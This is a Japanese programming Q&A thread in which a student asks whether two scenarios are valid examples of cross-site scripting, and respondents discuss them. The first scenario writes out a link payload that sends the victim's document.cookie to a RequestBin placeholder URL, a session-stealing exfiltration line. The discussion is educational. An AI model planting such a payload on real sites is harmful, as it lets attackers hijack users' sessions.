質問をすることでしか得られない、回答やアドバイスがある。

15分調べてもわからないことは、質問しよう!

新規登録して質問してみよう
ただいま回答率
85.50%
セキュリティー

このタグは、コンピューターシステムの安全性やデータの機密性に関連したトピックの為に使われます。

XSS

XSS【クロスサイトスクリプティング】は、 ソフトウェアのセキュリティホールの一つで、Webサイトに脆弱性が あることからその脆弱性を利用し攻撃する手法です。 主に、入力フォームなどから悪意あるスクリプトを挿入し 該当ページを閲覧したブラウザ上でそのスクリプトを実行します。

Q&A

解決済

2回答

1587閲覧

XSSの具体例について

konnitiha2

総合スコア30

セキュリティー

このタグは、コンピューターシステムの安全性やデータの機密性に関連したトピックの為に使われます。

XSS

XSS【クロスサイトスクリプティング】は、 ソフトウェアのセキュリティホールの一つで、Webサイトに脆弱性が あることからその脆弱性を利用し攻撃する手法です。 主に、入力フォームなどから悪意あるスクリプトを挿入し 該当ページを閲覧したブラウザ上でそのスクリプトを実行します。

0グッド

2クリップ

投稿2021/01/26 05:14

情報系学生で昨日もXSS(クロスサイトスクリプティング)に関する質問をさせていただいたものです。
どこからどこまでがXSSの具体例と言っていいのかを聞きたいです
下記に示しております事例1、事例2がそれぞれXSSの具体例として適切であるかご意見いただけると幸いです

事例1
下記画像にあるようなXSSに対する脆弱性がある掲示板に、悪意のあるユーザがRequestBinというサイトにクリックするとセッション情報を送る<a href=javascript:window.location='RequestBinのURL?'.concat(document.cookie);>アンケート</a>というコードを埋め込んだとして、これを一般ユーザがクリックして実際にセッション情報が奪われた。

イメージ説明

事例2
下記画像に大まかな流れが書いてあるのですが、詳しく説明すると
①攻撃者が脆弱性のあるサイトAのURLにスクリプトを埋め込んだものを掲示板に投稿する
②一般ユーザが掲示板に投稿されているサイトAのURLをクリックする
③スクリプトを埋め込まれているURLでサイトAにアクセス
④スクリプトが埋め込まれたファイルが送られユーザのブラウザで実行される
⑤ユーザのブラウザ上で「ウイルスに感染しました」などのalertが表示される
イメージ説明

お手数をおかけしますが、解答よろしくお願いします

気になる質問をクリップする

クリップした質問は、後からいつでもMYページで確認できます。

またクリップした質問に回答があった際、通知やメールを受け取ることができます。

バッドをするには、ログインかつ

こちらの条件を満たす必要があります。

退会済みユーザー

退会済みユーザー

2021/01/26 05:18

あなたの理解した内容を発表する場なのでは? 前の質問は XSS から外れてたし、ちゃんと理解していないのでは? ちょっと丸投げが過ぎると思います。
m.ts10806

2021/01/26 05:27

あまり、質問としてなってないと思います
guest

回答2

0

ベストアンサー

いずれもXSSの例であることは疑いがありますが、事例2の方は、あまり適切な例ではないと思います。なぜなら、

ユーザのブラウザ上で「ウイルスに感染しました」などのalertが表示される

だけであれば、サイトAの脆弱性を使わなくてもできるからです。被害者は掲示板でリンク先のアクセスはするわけですから、攻撃者のサイトに遷移させても任意文言でのalert表示はできます。XSSを使う場合と使わない場合は、リンク先が信頼のおけるドメインであるか否かで、これ自体は意味がありますが、XSSのように色々なことができる脆弱性を使ったわりには見返りが少なく「もったいない」応用であるように思いました。

投稿2021/01/26 13:18

ockeghem

総合スコア11701

バッドをするには、ログインかつ

こちらの条件を満たす必要があります。

0

いずれも XSS だと思います。

わたしは Wikipedia の定義で問題ないと思っています。
https://ja.wikipedia.org/wiki/%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0

気になる点はある場合、「これこれの特徴があるので XSS に当てはらまないのでは?」という見解を書いていただければと。

投稿2021/01/26 05:26

68user

総合スコア2005

バッドをするには、ログインかつ

こちらの条件を満たす必要があります。

あなたの回答

tips

太字

斜体

打ち消し線

見出し

引用テキストの挿入

コードの挿入

リンクの挿入

リストの挿入

番号リストの挿入

表の挿入

水平線の挿入

プレビュー

15分調べてもわからないことは
teratailで質問しよう!

ただいまの回答率
85.50%

質問をまとめることで
思考を整理して素早く解決

テンプレート機能で
簡単に質問をまとめる

質問する

関連した質問